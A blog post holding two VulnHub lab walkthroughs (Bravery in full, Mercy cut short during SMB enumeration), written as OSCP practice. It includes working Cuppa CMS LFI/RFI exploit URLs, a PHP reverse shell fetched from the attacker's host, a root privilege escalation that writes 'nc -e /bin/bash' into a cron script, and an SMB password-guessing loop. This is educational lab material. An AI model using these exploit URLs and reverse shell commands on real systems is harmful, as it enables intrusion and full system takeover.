Digitalworld Bravery VulnHub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.


Digitalworld.local Bravery https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

This box was basically all dependent on enumeration. There’s a lot to look at and go through, but you have to keep going and searching. 95% of the time is spent getting the initial shell. I really liked this box because I got to focus on enumeration and note-taking.

Keeping a cool head, taking good notes about what was found and tried, and pushing forward was key. It isn’t a straight shot to a shell, and there’s a lot of content to go through.

Flow

  1. Run nmap
  2. Run gobuster on ports 80 and 8080
  3. Possible users discovered and cuppacms possible?
  4. NFS share available, /var/nfsshare with user:pass for SMB
  5. Used user:pass with NFS for anonymous share and secured share
  6. /genevieve/ exists, /genevieve/cuppaCMS/index.php exists
  7. Cuppa CMS vulnerability exists and works
  8. Reverse shell by RFI
  9. MySQL access is possible, creds found but lead nowhere
  10. Run a suid/sgid check, find /usr/bin/cp is suid
  11. Can overwrite maintenance.sh script to get a root reverse shell

Enumeration

Nmap – TCP Ports

nmap -sC -sV -oA nmap/tcp_all_ports -p- 10.88.42.131
Nmap scan report for 10.88.42.131
Host is up (0.00053s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 4d:8f:bc:01:49:75:83:00:65:a9:53:a9:75:c6:57:33 (RSA)
|   256 92:f7:04:e2:09:aa:d0:d7:e6:fd:21:67:1f:bd:64:ce (ECDSA)
|_  256 fb:08:cd:e8:45:8c:1a:c1:06:1b:24:73:33:a5:e4:77 (ED25519)
53/tcp    open  domain      dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40222/udp   nlockmgr
|   100021  1,3,4      40701/tcp6  nlockmgr
|   100021  1,3,4      45776/tcp   nlockmgr
|   100021  1,3,4      47137/udp6  nlockmgr
|   100024  1          35505/tcp   status
|   100024  1          37004/udp   status
|   100024  1          40896/udp6  status
|   100024  1          55507/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2018-06-10T15:53:25
|_Not valid after:  2019-06-10T15:53:25
|_ssl-date: TLS randomness does not represent time
445/tcp   open  netbios-ssn Samba smbd 4.7.1 (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     3 (RPC #100227)
3306/tcp  open  mysql       MariaDB (unauthorized)
8080/tcp  open  http        nginx 1.12.2
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 4 disallowed entries 
|_/cgi-bin/ /qwertyuiop.html /private /public
|_http-server-header: nginx/1.12.2
|_http-title: Welcome to Bravery! This is SPARTA!
20048/tcp open  mountd      1-3 (RPC #100005)
35505/tcp open  status      1 (RPC #100024)
45776/tcp open  nlockmgr    1-4 (RPC #100021)
MAC Address: 00:0C:29:AD:E6:EA (VMware)
Service Info: Host: BRAVERY

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.1)
|   Computer name: localhost
|   NetBIOS computer name: BRAVERY\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2020-06-18T07:43:48-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-18T11:43:48
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds

Nmap – UDP Top 1000 Ports

nmap -sU -sC -sV -oA nmap/udp_top_1000_ports -p 1-1000 10.88.42.131
Nmap scan report for 10.88.42.131
Host is up (0.00081s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE     VERSION
53/udp  open          domain      dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
|_dns-recursion: Recursion appears to be enabled
68/udp  open|filtered dhcpc
111/udp open          rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40222/udp   nlockmgr
|   100021  1,3,4      40701/tcp6  nlockmgr
|   100021  1,3,4      45776/tcp   nlockmgr
|   100021  1,3,4      47137/udp6  nlockmgr
|   100024  1          35505/tcp   status
|   100024  1          37004/udp   status
|   100024  1          40896/udp6  status
|   100024  1          55507/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
137/udp open          netbios-ns  Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
846/udp open          rpcbind     2-4 (RPC #100000)
MAC Address: 00:0C:29:AD:E6:EA (VMware)
Service Info: Host: BRAVERY

Host script results:
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

I started UDP for 1000+ ports, but I ended up rebooting and forgot to restart it. Luckily, I didn’t need it.

Services

A lot is going on here. Obviously, web servers stand out, but also SMB shares and NFS shares. Additionally, perhaps I’ll need to try a domain transfer to get subdomains?

So, let’s dig in. Port 80, port 8080, SMB, and NFS.

Port 80

Gobuster

/about (Status: 200)
/1 (Status: 200)
/2 (Status: 200)
/4 (Status: 200)
/3 (Status: 200)
/contactus (Status: 200)
/5 (Status: 200)
/6 (Status: 200)
/9 (Status: 200)
/7 (Status: 200)
/0 (Status: 200)
/8 (Status: 200)
/uploads (Status: 301)

/8 Has Contents

80 and 8080 are best friends!

/about Has Contents

Visit https://www.captiongenerator.com/1075692/Try-Harder for a free hint! :-)

Nope! Not going to check that out.

/contactus Has Contents

Contact us at our hotline!

/uploads Has Contents

Possible users found from browsing the directory listings: patrick, qinyi, sara, and qiu.

/uploads/files/internal/department/procurement/sara/note.txt is the only file in there.

Remind gen to set up my cuppaCMS account.

Port 8080

/robots.txt

User-agent: *
Disallow: /cgi-bin/
Disallow: /qwertyuiop.html
Disallow: /private
Disallow: /public

/cgi-bin/

404 URL.

/qwertyuiop.html

I viewed the source, looked at the image details, but didn’t find anything. So stored “qwertyuiop” as a possible password.

/private

403 URL.

/public

It appears to be a stubbed website. The unique thing is a mail.php that prompts for download, so there’s nothing executing PHP on the 8080 port.

Gobuster

/img (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

Normal stuff.

/public/about

Prompts to download this file with this content.

********** ABOUT US *********

* We are a fun-loving group *
  that takes our work quite
* seriously. In our line of *
  work, we believe that the 
* most important quality of *
  our work is our effort to 
* TRY HARDER. TRYING HARDER *
  takes courage. We believe 
* we can strive for greater *
  heights, and achieve good
* things as long as we dare *
  to TRY HARDER. Are you up 
* to our challenge? I think *
  you should TRY HARDER! :) 
*                           *

*****************************

MySQL

Can’t connect to the machine, likely only allowing localhost.

ERROR 1130 (HY000): Host '10.88.42.130' is not allowed to connect to this MariaDB server

SMB

[17:34:34]🔴->1 root[ ~/VulnHub/bravery ]# smbclient -L \\\\10.88.42.131
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        anonymous       Disk      
        secured         Disk      
        IPC$            IPC       IPC Service (Samba Server 4.7.1)
SMB1 disabled -- no workgroup available
[17:34:42]🔥root[ ~/VulnHub/bravery ]# 

Unfortunately, I couldn’t access those shares without a login.

NFS

[17:19:59]🔥root[ ~/VulnHub/bravery ]# showmount -e 10.88.42.131
Export list for 10.88.42.131:
/var/nfsshare *
[17:20:02]🔥root[ ~/VulnHub/bravery ]# 
...
mkdir nfsshare
mount 10.88.42.131:/var/nfsshare nfsshare

Great! I got new files; now time to explore them.

nfsshare/README.txt
nfsshare/qwertyuioplkjhgfdsazxcvbnm
nfsshare/discovery
nfsshare/password.txt
nfsshare/explore
nfsshare/enumeration
nfsshare/itinerary
for file in $(find nfsshare -type f); do echo ">> $file <<"; cat $file; done

>> nfsshare/README.txt <<
read me first!
>> nfsshare/qwertyuioplkjhgfdsazxcvbnm <<
Sometimes, the answer you seek may be right before your very eyes.
>> nfsshare/discovery <<
Remember to LOOK AROUND YOU!
>> nfsshare/password.txt <<
Passwords should not be stored in clear-text, written in post-its or written on files on the hard disk!
>> nfsshare/explore <<
Exploration is fun!
>> nfsshare/enumeration <<
Enumeration is at the heart of a penetration test!
>> nfsshare/itinerary/david <<
David will need to fly to various cities for various conferences. Here is his schedule.

1 January 2019 (Tuesday):
New Year's Day. Spend time with family.

2 January 2019 (Wednesday): 
0900: Depart for airport.
0945: Check in at Changi Airport, Terminal 3.
1355 - 2030 hrs (FRA time): Board flight (SQ326) and land in Frankfurt.
2230: Check into hotel.

3 January 2019 (Thursday):
0800: Leave hotel.
0900 - 1700: Attend the Banking and Enterprise Conference.
1730 - 2130: Private reception with the Chancellor.
2230: Retire in hotel.

4 January 2019 (Friday):
0800: Check out from hotel.
0900: Check in at Frankfurt Main.
1305 - 1355: Board flight (LH1190) and land in Zurich.
1600 - 1900: Dinner reception
2000: Check into hotel.

5 January 2019 (Saturday):
0800: Leave hotel.
0930 - 1230: Visit University of Zurich.
1300 - 1400: Working lunch with Mr. Pandelson
1430 - 1730: Dialogue with students at the University of Zurich.
1800 - 2100: Working dinner with Mr. Robert James Miller and wife.
2200: Check into hotel.

6 January 2019 (Sunday):
0730: Leave hotel.
0800 - 1100: Give a lecture on Software Security and Design at the University of Zurich.
1130: Check in at Zurich.
1715 - 2025: Board flight (LX18) and land in Newark.
2230: Check into hotel.

7 January 2019 (Monday):
0800: Leave hotel.
0900 - 1200: Visit Goldman Sachs HQ
1230 - 1330: Working lunch with Bill de Blasio
1400 - 1700: Visit McKinsey HQ
1730 - 1830: Visit World Trade Center Memorial
2030: Return to hotel.

8 January 2019 (Tuesday):
0630: Check out from hotel.
0730: Check in at Newark.
0945 - 1715 (+1): Board flight (SQ21)

9 January 2019 (Wednesday):
1715: Land in Singapore.
1815 - 2015: Dinner with wife.
2100: Clear local emails and head to bed.

So, I have a username “david” and “qwertyuioplkjhgfdsazxcvbnm” is likely a password, too. That’s two clues to it now. I added the username and password to the growing password list.

SMB – Revisited

anonymous Share

Now that I have some usernames and passwords, I tried out “david” and “qwertyuioplkjhgfdsazxcvbnm” first, and it worked!

mkdir -p smb/anonymous
smbclient \\\\10.88.42.131\\anonymous -Udavid
smb: \> prompt
smb: \> recurse
smb: \> mget "patrick's folder"
smb: \> mget "qiu's folder"
smb: \> mget "genevieve's folder"
smb: \> mget "david's folder"
smb: \> mget "kenny's folder"
smb: \> mget "qinyi's folder"
smb: \> mget "sara's folder"
smb: \> mget readme.txt

There’s a ton of files to filter through.

[17:47:23]🔥root[ ~/VulnHub/bravery/smb/anonymous ]# find . -type f | wc -l
461
[17:47:29]🔥root[ ~/VulnHub/bravery/smb/anonymous ]# 

After manually going through the files, most of them are empty, so I decided to use some bash to go through them.

cd ..
find . -type f > filelist.txt
cd anonymous
while read -r line; do [ -s "$line" ] && echo ">> $line <<"|tee -a ../anonymous_nonempty_files.txt; cat "$line"|tee -a ../anonymous_nonempty_files.txt ; done < ../filelist.txt

>> ./sara's folder/gossip_corner/gossip18 <<
Qiu gives me too much work. I'm really stressed.
>> ./sara's folder/gossip_corner/gossip27 <<
Misconfigurations are the nightmare of system administrators.
>> ./sara's folder/gossip_corner/gossip5 <<
If only I could get back at the boss... she's so nasty. She controls EVERYTHING and doesn't trust me in even administering her tomcat server.
>> ./sara's folder/gossip_corner/gossip23 <<
Que sera sera, whatever will be, will be.
>> ./sara's folder/email/2048 <<
2048 is a game.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

BUT...

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

The CTF is not just a game. It's more than a game. It's about TRYING HARDER... and making sure this machine gets rooted!

.
.
.

ALL THE BEST! TRY HARDER!
>> ./genevieve's folder/CMS/migration/important! <<
need to migrate CMS. obsolete. speak to qiu about temporarily using her IIS to test a sharepoint installation.
>> ./genevieve's folder/email/spear <<
Amidst the flurry of content are certain files that may stand out. Smart bravery will allow you to read what you want; stupid bravery is called recklessness.
>> ./patrick's folder/work!/present_for_qiu/present <<
Should I bring her to watch the "Phantom of the Opera"?

Hmmmm... but she looks so stressed recently... :-(
>> ./patrick's folder/work!/samba/david_secured_share/readme/readme.txt <<
Please DO NOT spread the password around.
>> ./kenny's folder/vuln_assessment_team/windows/XP_disclaimer <<
XP is no longer provided; please upgrade to win7 or win10 because we no longer support XP.
>> ./readme.txt <<
-- READ ME! --

This is an INTERNAL file-sharing system across SMB. While awaiting migration to Sharepoint, we are currently relying on the use of the SMB protocol to share information.

Once we migrate everything to Sharepoint, we will kill off this temporary service. This service will be re-purposes to only share UNCLASSIFIED information.

We also noticed the archival of plenty of e-mail. Please remove all of that before migration, unless you need them.

Regards
Genevieve the Brave

I didn’t see anything useful in the files, but I did add two new users: “kenny” and “genevieve.”

secured Share

[18:15:37]🔥root[ ~/VulnHub/bravery/smb/secured ]# smbclient \\\\10.88.42.131\\secured -U david
Enter WORKGROUP\david's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Sep 28 09:52:14 2018
  ..                                  D        0  Thu Jun 14 12:30:39 2018
  david.txt                           N      376  Sat Jun 16 04:36:07 2018
  genevieve.txt                       N      398  Mon Jul 23 12:51:27 2018
  README.txt                          N      323  Mon Jul 23 21:58:53 2018

                17811456 blocks of size 1024. 13166144 blocks available
smb: \> prompt
smb: \> get *
NT_STATUS_OBJECT_NAME_INVALID opening remote file \*
smb: \> mget *
getting file \david.txt of size 376 as david.txt (73.4 KiloBytes/sec) (average 73.4 KiloBytes/sec)
getting file \genevieve.txt of size 398 as genevieve.txt (97.2 KiloBytes/sec) (average 84.0 KiloBytes/sec)
getting file \README.txt of size 323 as README.txt (105.1 KiloBytes/sec) (average 89.3 KiloBytes/sec)
smb: \> 

And the file contents.

[18:16:34]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat david.txt 
I have concerns over how the developers are designing their webpage. The use of "developmentsecretpage" is too long and unwieldy. We should cut short the addresses in our local domain.

1. Reminder to tell Patrick to replace "developmentsecretpage" with "devops".

2. Request the intern to adjust her Favourites to http://<developmentIPandport>/devops/directortestpagev1.php.
[18:16:37]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat genevieve.txt 
Hi! This is Genevieve!

We are still trying to construct our department's IT infrastructure; it's been proving painful so far.

If you wouldn't mind, please do not subject my site (http://192.168.254.155/genevieve) to any load-test as of yet. We're trying to establish quite a few things:

a) File-share to our director.
b) Setting up our CMS.
c) Requesting for a HIDS solution to secure our host.
[18:16:48]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat README.txt 
README FOR THE USE OF THE BRAVERY MACHINE:

Your use of the BRAVERY machine is subject to the following conditions:

1. You are a permanent staff in Good Tech Inc.
2. Your rank is HEAD and above.
3. You have obtained your BRAVERY badges.

For more enquiries, please log into the CMS using the correct magic word: goodtech.
[18:16:53]🔥root[ ~/VulnHub/bravery/smb/secured ]# 

So, this is awesome; now I have more web URLs that I didn’t have previously.

I tried /developmentsecretpage and /devops on port 80 and 8080, but it was 404 on both. Fortunately, /genevieve was not 404.

Port 80 – Revisited

Browsing the website on /genevieve is a template site but has a link to Cuppa CMS!

http://10.88.42.131/genevieve/cuppaCMS/index.php

cuppaCMS

I searched searchsploit and found a possible cuppaCMS exploit at https://www.exploit-db.com/exploits/25971. So I tried it, and it worked!

http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Configuration.php contents. I added the password to the list.

<?php 
	class Configuration{
		public $host = "localhost";
		public $db = "bravery";
		public $user = "root";
		public $password = "r00tisawes0me";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "goodtech";
		public $secure_login_redirect = "doorshell.jpg";
	} 
?>

So, I decided to give the RFI a go.

mkdir www
cp /usr/share/laudanum/php/php-reverse-shell.php www/
cd www
vi php-reverse-shell.php
python3 -m http.server 80
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://10.88.42.130/php-reverse-shell.php
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http%3A%2F%2F10%2E88%2E42%2E130%2Fphp%2Dreverse%2Dshell%2Ephp

Boom, Popped A Shell!

The RFI worked! I tried to su to david with the password I have, but it didn’t work out.

MySQL – Revisited

Hoping there are passwords stored in there to pivot to “david” or “rick.” I connected using the login info from Configuration.php from earlier.

The “cu_users” table has usernames and passwords in it.

I ran the MD5 hashes through CrackStation.net.

I added the extra usernames and passwords to the list. None of the passwords were meaningful to pivot to root or another user. The only MySQL user is the root user I connected with.

Normal Linux PrivEsc

Before running LinEnum.sh, I decided to search for SUID and SGID files.

Obviously, /usr/bin/cp is not supposed to be SUID, and it stood out like a sore thumb.

From probing around before, I saw the maintenance.sh script but didn’t think much of it. It actually took me a little while to come back to it again to find I could use cp to overwrite the file.

The script is run by root (likely by a cronjob), is owned by root, and I can’t write to it.

bash-4.2$ echo -e '#!/bin/sh\nnc -e /bin/bash 10.88.42.130 9999\n' > /tmp/maintenance.sh
<h\nnc -e /bin/bash 10.88.42.130 9999\n' > /tmp/maintenance.sh               
bash-4.2$ cat /tmp/maintenance.sh
cat /tmp/maintenance.sh
#!/bin/sh
nc -e /bin/bash 10.88.42.130 9999

bash-4.2$ cp /tmp/maintenance.sh /var/www/maintenance.sh;cat /var/www/maintenance.sh
<ce.sh /var/www/maintenance.sh;cat /var/www/maintenance.sh                   
#!/bin/sh
nc -e /bin/bash 10.88.42.130 9999

bash-4.2$ 

So, I overwrote it and waited… and the root shell popped!

Digitalworld Mercy Vulnhub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.


Digitalworld.local Mercy V2 https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/

I liked this box, and it reminds me of OSCP exam machines and good Hack The Box machines. There’s enumeration across multiple services, uses different vulnerability exploitations, and has three different stages of initial access, user account, and root access. I love the 3 stage access option because I’m used to it with Hack The Box, but OSCP machines don’t always have 3 stages.

Luckily much of the stuff that is important for me solving this box was in the Nmap output. There would be possible rabbit holes if I missed that. It really makes me think that I missed stuff in the exam that prohibited me from having a full picture to help me solve machines in my OSCP exam. I am glad I am working on purposefully ensuring my enumeration is good, and I take good notes (even the stuff that doesn’t work/work out).

This machine would have been more difficult if there were not any robot.txt files.

Flow

  1. Enumerate ports
  2. Port 8080 – /tryharder/tryharder
  3. SMB qiu share works with qiu:password (clue from tryharder file)
  4. Download qiu files from SMB share
  5. Knock to open up port 22 and port 80 (knockd settings in SMB share file)
  6. Find LFI in RIPS 0.53 on port 80
  7. Read files on filesystem via LFI
    1. Read /etc/passwd to get local usernames
    2. Read tomcat configuration to get more logins (tomcat admin and local user)
  8. Log in to Tomcat admin interface, upload a reverse shell war file, get a reverse shell
  9. Pivot to fluffy user
  10. Pop a root shell from a root cronjob, editing a file writable by fluffy
  11. Get flag

Initial Enumeration

IP="10.88.42.132"
mkdir -p nmap
nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_$IP $IP
nmap -Pn -sC -sV -p 1000-65535 -oA nmap/nmap_1000plus_$IP $IP
nmap -sC -sU -p 1-1000 -oA nmap/nmap_udp1000_$IP $IP

Top 1000 TCP Ports

# Nmap 7.80 scan initiated Sun Jun 14 12:48:55 2020 as: nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_10.88.42.132 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.0014s latency).
Not shown: 991 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp  filtered ssh
53/tcp  open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp  filtered http
110/tcp open     pop3        Dovecot pop3d
|_pop3-capabilities: TOP UIDL RESP-CODES STLS AUTH-RESP-CODE SASL CAPA PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open     imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: post-login OK have LOGINDISABLEDA0001 LOGIN-REFERRALS STARTTLS SASL-IR listed Pre-login more capabilities IDLE IMAP4rev1 ID ENABLE LITERAL+
|_ssl-date: TLS randomness does not represent time
445/tcp open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open     ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open     ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: mercy
|   NetBIOS computer name: MERCY\x00
|   Domain name: \x00
|   FQDN: mercy
|_  System time: 2020-06-15T00:49:10+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-14T16:49:10
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 12:51:36 2020 -- 1 IP address (1 host up) scanned in 160.82 seconds

Remaining 1000+ TCP Ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 12:52 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).
Not shown: 64535 closed ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry 
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:67:71:C0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds

UDP Top 1000 Ports

# Nmap 7.80 scan initiated Sun Jun 14 12:56:33 2020 as: nmap -sC -sU -p 1-1000 -oA nmap/nmap_udb1000_10.88.42.132 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00079s latency).
Not shown: 993 closed ports
PORT    STATE         SERVICE
53/udp  open          domain
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
|_dns-recursion: Recursion appears to be enabled
68/udp  open|filtered dhcpc
123/udp open          ntp
| ntp-info: 
|_  
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm
323/udp open|filtered unknown
631/udp open|filtered ipp
MAC Address: 00:0C:29:67:71:C0 (VMware)

Host script results:
|_clock-skew: 8s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

# Nmap done at Sun Jun 14 13:16:06 2020 -- 1 IP address (1 host up) scanned in 1172.80 seconds

SMB Enumeration

[13:21:03]🔥root[ /home/kali/VulnHub/mercy ]# smbclient -L 10.88.42.132 
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        qiu             Disk      
        IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[13:21:18]🔥root[ /home/kali/VulnHub/mercy ]# 

So, qui is interesting. Keep track of that as a possible user.

TCP 8080 – /tryharder/tryharder Step

Nmap noticed that robots.txt and a path exists.

robots.txt

http://10.88.42.132:8080/robots.txt
User-agent: *
Disallow: /tryharder/tryharder

/tryharder/tryharder

SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg==

It is base64; once decoded, it decoded into the text below.

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

Port 8080 – Normal

Attempting to access the manager/admin interface for Tomcat requires a login. So, we need a login (which should be no surprise). It is Tomcat 7.

SMB Share – qiu

I am a dummy here again. I get that the “password” is clearly spelled out, but I was used to being tricked for some reason, so I used the entire tryharder decoded file contents word by word to find it.

for pass in $(cat tryharder.txt); do echo ">> $pass <<" && smbclient \\\\10.88.42.132\\qiu -U qiu "$pass" 2>/dev/null ; done

Which stopped for the password of “password” works. After that, I literally said to myself, “you’re a dummy.”

We can log in directly.

Now we should download all the files.

prompt
recurse
mget *

The only important files are config and configprint, with configprint appending configuration files to the config file. It includes multiple configs, but the one we care about is the knockd configuration because ports 80 and 22 are filtered (and likely firewalled off).

configprint

#!/bin/bash

echo "Here are settings for your perusal." > config
echo "" >> config
echo "Port Knocking Daemon Configuration" >> config
echo "" >> config
cat "/etc/knockd.conf" >> config
echo "" >> config
echo "Apache2 Configuration" >> config
echo "" >> config
cat "/etc/apache2/apache2.conf" >> config
echo "" >> config
echo "Samba Configuration" >> config
echo "" >> config
cat "/etc/samba/smb.conf" >> config
echo "" >> config
